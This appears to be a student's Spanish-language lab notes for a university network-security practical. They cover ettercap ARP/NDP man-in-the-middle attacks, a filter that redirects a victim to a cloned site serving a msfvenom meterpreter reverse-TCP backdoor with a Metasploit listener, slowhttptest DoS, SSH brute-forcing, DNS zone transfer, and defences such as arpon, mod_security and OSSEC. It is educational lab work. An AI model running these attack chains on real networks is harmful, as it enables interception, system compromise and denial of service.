
a)Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
It supports active and passive dissection of many protocols and includes many features for network and host analysis.


Ettercap ofrece cuatro interfaces de usuario :

-T utiliza la GUI de sólo texto
-P se indica pluging
-i indica la interfaz
-q quiet para que no muestre nd por pantalla
-w para guardar info en fichero pcap
-s probar con https
-M mitm


[*] etercap -T arranca el etercap sin interfaz grafica.

[*] Su fichero de configuracion está en: /etc/ettercap/etter.conf

Para más info: ettercap -h

[*] Para guardar la info de hosts conectados a una red usamos: ettercap -T -k /usr/local/hosts_ettercap.txt

[*] Capturar paqueteria: 
ettercap -Tq -i ens33 -P repoison_arp -M  arp:remote /10.11.49.132// /10.11.48.1// -w info.pcap 

Buscar algo como: apuntes matematicas pdf
		
	o

http://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png



B) ATACANTE: ettercap -Tq -i ens33 -P repoison_arp -M  arp:remote /10.11.49.122// /10.11.48.1// -w apartado_b.pcap

VÍCTIMA: elinks apuntes matemáticas pdf
elinks http://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png
 


c) Para las direcciones usamos: ettercap -i ens33 -Tq /10.11.48.1// 
		
		o 
   
	nast -m -i ens33


Enseñamos la lista de hosts con -L


d) Para las direcciones usamos: ettercap -i ens33 -Tq -6 /10.11.48.1//



e)tcpdump -i ens33,

	o

ettercap -Tq -p -z -i ens33 -w apartado_e.pcap

(repasar)



f)

Cambiar en/etc/ettercap/etter.conf:
        ec_uid = 0 y ec_gid = 0
        remote_browser="lynx -remote openurl(http://%host%url)"
        ?(descomentar lineas de redir_command_on = .. y redir_command_off = ... en el apartado de LINUX)
    	"ettercap -T -P remote_browser -M arp:remote /10.11.49.122// /10.11.48.1//"



g)

Creación de filtro:


Generamos un .filter -> touch filter.filter


Lo editamos y rellenamos con lo que queramos:


if (ip.proto == TCP && tcp.src == 80) {
   if (regex(DATA.data, ".*Defensa Práctica 1 LSI.*")) {  //Si la web en la que entra mi victima contiene eso
      drop();
      inject("/tmp/redireccion.txt");  //Inyectamos un txt con un refresh que lo lleva a mi server
      msg("Funciona");
   }
}


/tmp/redireccion.txt:

<html>
   <head>
      <meta http-equiv="Refresh" content="0; URL=http://10.11.49.122">
   </head>
   <body></body>
</html>


Compilamos el filtro: etterfilter filter.filter -o filter.ef


Sniffamos: ettercap -Tq -i ens33 -F filter.ef -M  arp:remote /IPVictima// /10.11.48.1//


De esta manera la victima es redirigida al server local, que es un clon de la web anterior y que 
contiene la back door escondida, la cual se descargará y ejecutará.


En /var/www/html/index.html esta el codigo de mi web. En este misso directorio esta el ejecutable malicioso.


Generacion ejecutable -> msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=miip lport=YYYY -f elf -o myProgram


Damos permisos -> chmod +x myProgram


Abrimos metasploit -> msfconsole (-q)


Usamos meterpreter con este modulo-> use exploit/multi/handler


Indicamos el payload usado para el reverse_tcp -> set payload linux/x64/meterpreter_reverse_tcp


Ponemos el host al que se hace la conexion -> set LHOST miip


Ponemos el puerto con el que creamos la backdoor -> set LPORT YYYY


Esperamos a que se ejecute nuestro payload -> run


h) 

Activar ipv6 forwarding

atk6-parasite6 ens33 -> MITM a ens33

nuestro compi genera tafico ICMP con ping6 ff02::1

atk6-alive6 ens33 ping a todas las redes para ver las que estan vivas

o

ettercap -Tq -i ens33 -M ndp:oneway -w info.pcap /10.11.49.132/fe80::250:56ff:fe97:3792/ /10.11.48.1//


i) Editamos el fichero etc/arpon.conf para las ip-mac que queremos detectar con Arpon.

Editamos etc/default/arpon y usamos sarpi y metemmos ens33 en las interfaces

sudo arpon -i ens33 -S

Leemos el fichero de logs  sudo tail -f /var/log/arpon/arpon.log

Para vaciar caché: sudo ip -s -s neigh flush all

Ver caché: arp -a

Con arpon activado no te deja esnifar 

ettercap -Tq -i ens33 -P repoison_arp -M  arp:remote /10.11.49.122// /10.11.48.1//




j) 

	-sL: Sondeo de lista - Simplemente lista los objetivos a analizar
        -sP: Sondeo Ping     - Sólo determina si el objetivo está vivo
        -P0: Asume que todos los objetivos están vivos
        -PS/PA/PU [listadepuertos]: Análisis TCP SYN, ACK o UDP de los puertos indicados
        -PE/PP/PM: Solicita un análisis ICMP del tipo echo, marca de fecha y máscara de red
        -n/-R: No hacer resolución DNS / Siempre resolver [por omisión: a veces]
        --dns-servers <serv1[,serv2],...>: Especificar servidores DNS específicos
        --system-dns: Utilizar la resolución del sistema operativo



   nmap -sn -PS 10.11.49.132 (tecnica SYN ACK) Ve que máquinas están levantadas
   nmap -sn -PS 10.11.48.0/23 Al router
	
   nmap -v 10.11.49.132 (PORT SCANNING) Muestra puertos abiertos
   nmap -v -6 fe80::250:56ff:fe97:158a (PORT SCANNING sobre IPv6)
   nmap -sV  --version-intensity 9  10.11.49.132

   nmap -O --osscan-guess 10.11.49.132 (OS fingerprinting muy intenso)
   Info: https://nmap.org/book/osdetect-fingerprint-format.html

   Si, coinciden los servicion de puertos en ipv4 e ipv6

vnstat

k) iftop o vnstat -i ens33
   tcptrack -i ens33
	
   bmon instalar y probar


l) Dos direct attack:
Usamos la herramienta nMap para hacer un host Discovery para ver si la máquina está encendida.
Si la máquina víctima está conectada, realizaremos el ataque a todos sus puertos abiertos; si está desconectada, al puerto 22 (ssh), podemos ver los puertos abiertos haciendo un port scanning.

Dos reflective flooding: Necesitamos otra máquina más que ataque a la máquina víctima,
enviamos paquetes a la red para que solo uno de ellos conteste y se sature.


m) slowhttptest -c 3000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.11.49.132 -x 10 -p 3

-c numero de conexiones

-B POST mode, manda mensajes HTTP sin acabar (el servidor los coge y llega un punto que supera el limite)

-g genera csv y http ficheros

-o para stats

-i Specifies the interval between follow up data for slowrois and Slow POST tests

-r conexiones por segundo

-s bytes de longitud del header POST

-t Start slow POST test

-u url

-x

-p



RequestReadTimeout header=10-20,MinRate=500 body=20,MinRate=500 //poner en fondo fichero conf de apache


Para proteger el servicio del tipo SLOW POST tendria que aumnetar el numero de peticiones maximas posibles.

La directiva RequestReadTimeout permite limitar el tiempo que un cliente tarda en enviar una petición

El valor de la directiva TimeOut debería reducirse en sitios que son objeto de ataques DoS. Configurar ésta a unos segundos podría ser apropiado

Ajuste la directiva MaxRequestWorkers para permitir al servidor gestionar el máximo número de conexiones simultáneas sin quedarse sin recursos

Usar Módulos de MultiProcesamiento gestiona mas conexiones simultaneamente

Una manera de protegernos seria reducir el tiempo de Keep-Alive-Timeout (por ejemplo a 1), reducir el Timeout (por ejemplo a 30). Ademas de esto tambien deberiamos instalar algun plugin o programa como modsecurity para bloquear clientes que estan generando un gran número de peticiones. Esta proteción la podríamos saltar realizando un DDoS en vez de un DoS.



n) 

Instalar: apt install libapache2-mod-security2

Cambiamos conf-recommended por conf: cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf

En etc/apache2/apache2.conf ponemos el Timeout a 20 y el KeepAliveTimeout a 1

Miramos que en /etc/apache2/mods-avaliable/security2.conf tengamos estas lineas:

Include /etc/modsecurity/*.conf
IncludeOptional /usr/share/modsecurity-crs/owasp-crs.load

Añadimos al principio de /etc/modsecurity/modsecurity.conf:

SecRuleEngine On
SecConnEngine On
SecConnWriteStateLimit 30  -> limitamos a 30 las conexiones desde una misma ip
SecConnReadStateLimit 30

Pa apagarlo -> SecRuleEngine Off  y restart

Asi evitamos ataques slowread y slowrite (slowhttp) y tambien impedimos los ataques OWASP Top 10


Para encender/apagar: a2enmod security2 / a2dismod security2


o)

Sacar rangos: https://apps.db.ripe.net/db-web-ui/query?bflag=false&dflag=false&rflag=true&searchtext=udc&source=RIPE

[*] host www.udc.es



[*]dig udc.es MX 
	o 
host -t MX udc.es 
	o 
nslookup -type=mx udc.es



[*]dig +short -t ns udc.es 
	o
nslookup -type=ns udc.es
	o
host -t ns udc.es



[*] dig @zipi.udc.es axfr udc.es
    nombres de dominio: nmap -sL 193.144.53.84/20 | grep udc.esclear



[*] whatweb www.usc.es




p) 

   nmap -sV 10.11.48.1
   nmap -sU -p 67 --script=dhcp-discover 10.11.48.0/24
   


q) 
   Iniciamos msfconsole, buscamos modulos relacionados con ataques a ssh: search ssh
   Usamos el modulo ssh_login: use auxiliary/scanner/ssh/ssh_login
   Miramos las opciones: options
   Ponemos la ip de nuestra victima: set rhosts 10.11.49.132
   Hacemos para que cuando encuentre la pass acabe: set stop_on_success true
   Hacemos un txt para usuarios: set user_file users.txt
   Hacemos un txt de passw: set pass_file passwords.txt
   Desplegamos los intentos: set verbose true
   Corremos el ataque: run

   Con nmap: nmap 10.11.49.132 -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt

r) 

Para comprobar usuarios baneados: iptables -L

Para encender: /var/ossec/bin/ossec-control start

Configuramos el e-mail:

<global> 
    <email_notification>yes</email_notification> 
    <email_to>lsi@localhost</email_to> 
    <smtp_server>127.0.0.1</smtp_server> 
    <email_from>ossecm@localhost</email_from> 
</global>

En /etc/logcheck/logcheck.conf ponemos sendmailto = 'lsi@localhost'

Para desbanear una ip: 

/var/ossec/active-response/bin/firewall-drop.sh delete – 10.11.49.132
/var/ossec/active-response/bin/host-deny.sh delete - 10.11.49.132 


#para comprobar que hemos configurado bien lanzamos un test
su -s /bin/bash -c "/usr/sbin/logcheck ./logcheck" logcheck

# para mostrar los logs sin ver el correo ejecutamos
su -s /bin/bash -c "/usr/sbin/logcheck -o -t" logcheck

# para ver los emails loggeados como lsi
mail



Mucho texto sobre el OSSEC:


When setting up commands, OSSEC is configured to look for the firewall-drop.sh script in the /var/ossec/active-response/bin directory. We declared the command to expect a source IP, so events dispatching this command without a valid source IP will be ignored. A timeout is allowed for active responses that call this command, allowing the pruning of unnecessary firewall rules by setting timeout_allowed to yes.

We add an active-response element to run the firewall-drop command. The location in this case is the local agent generating the alarm, but we could simply say "all" or specify a specific agent ID where the command needs to be run.

Adding and deleting firewall rules from production systems should be something that's very deliberate and specific. We configure the response to be fired on the following rules: 5551, 5712, 5720, and 31151. This is a selection of rules that indicates SSH brute-force probes/attacks. This is much more predictable than using groups or levels as sources of events.

A timeout value of 600 seconds is set for this active response. When this active response fires the first time, the script will be called with the action parameter set to add. Ten minutes later, OSSEC will re-run the script with the same parameters, only this time modifying the action parameter to delete.

Using the repeat_offenders parameter, we can adjust this timeout based on how frequently a particular source IP trips this active response. The first two timeouts are 10 minutes, the third time that the same IP trips the alert it moves into blocking mode for an hour, and for the fourth and for all subsequent times, the IP is blocked for 24 hours.

Active response can be configured to run anywhere on the network, so there's really no limit to how interesting your responses can be. There's also nothing preventing you from leveraging the active response system to assist you in tracking events. You could easily create a simple shell script to integrate OSSEC alerting directly into a ticketing system, such as JIRA, RTIR, or Remedy.



En el OSSEC si no desbaneamos de manera manual va a funcionar, OSSEC determina que no tiene nada que hacer, hay mas cosas que conexiones para banear.



s)

Para sacar alertas: cat /var/log/auth.log | /var/ossec/bin/ossec-logtest -a


Resumen de alertas: cat /var/log/auth.log | /var/ossec/bin/ossec-logtest -a | /var/ossec/bin/ossec-reportd


Visualizar alertas de nivel 10: cat /var/log/auth.log | /var/ossec/bin/ossec-logtest -a | /var/ossec/bin/ossec-reportd -f level 10

